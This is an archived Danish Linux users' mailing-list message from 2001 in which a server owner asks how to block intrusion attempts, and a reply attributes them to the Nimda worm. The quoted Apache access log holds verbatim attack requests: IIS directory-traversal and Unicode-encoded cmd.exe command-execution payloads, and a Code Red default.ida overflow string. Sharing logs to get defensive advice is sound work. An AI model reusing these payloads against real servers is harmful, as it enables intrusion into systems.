← Back to team overview

sslug-teknik team mailing list archive

  1. sslug-teknik team
  2. Mailing list archive
  3. Message #42222

Re: Hakker wannabees

  Thread PreviousDate PreviousThread Next 
Hejsa
Det er såmend ikke hackere du ser der - det er vores ven Limda (den der virus der floererede i sidste uge), som stakkels uvidende NT-administratorer er blevet smittet med... 


/Jesper


At 17:54 24-09-2001 +0200, you wrote:

Hello

Jeg har inden for de sidste 24 timer modtaget et par indbrudsforsøg fra
knap 20 forskellige IP adresser. Alle bruger ca. de samme exploits som
sjovt nok er en Microsoft ting og ikke vil kunne ramme mig. Det er med
andre ord ikke Kevin Mitnick jeg har med at gøre.
Det er dog temmelig irriterende. Kan man sætte sin firewall op til at
afvise forsøgene eller i det mindste sætte Apache til at sende dem en
HTML/PHP side med en advarsel ?
Andre forslag ?
Underligt at der kommer så mange forsøg med samme teknik på samme tid !!

Følgende er et par linjer fra min access log:

212.217.79.226 - - [24/Sep/2001:09:18:26 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 292
212.217.79.226 - - [24/Sep/2001:09:18:30 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 290
212.217.79.226 - - [24/Sep/2001:09:18:34 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:38 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:42 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:18:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:47 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:48 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347
212.217.79.226 - - [24/Sep/2001:09:18:52 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:05 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:07 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:08 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:12 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:15 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:19 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:19:23 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.158.24.240 - - [24/Sep/2001:09:33:17 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 287

Hvad ville I gøre i mit sted ?

Venlig hilsen
Robert


Brug <sslug-netvaerk@xxxxxxxx> til netværksemner


--
*******************************************
Jesper Hess Nielsen
Konsulent / Udvikler
NTV Communications a/s
Telefon: + 45 33 48 90 20
Direkte: + 45 33 48 90 24
Mobil: + 45 26 25 66 99
jesper@xxxxxxxxx - www.ntvcom.dk
Nørre Voldgade 2, 2 sal
1358 København K

*******************************************
"Unless you have been on Mars, in a cave, with your eyes shut and your fingers in your ears, you already know that XML is a possible solution to this problem. "

Follow ups

References

  Thread PreviousDate PreviousThread Next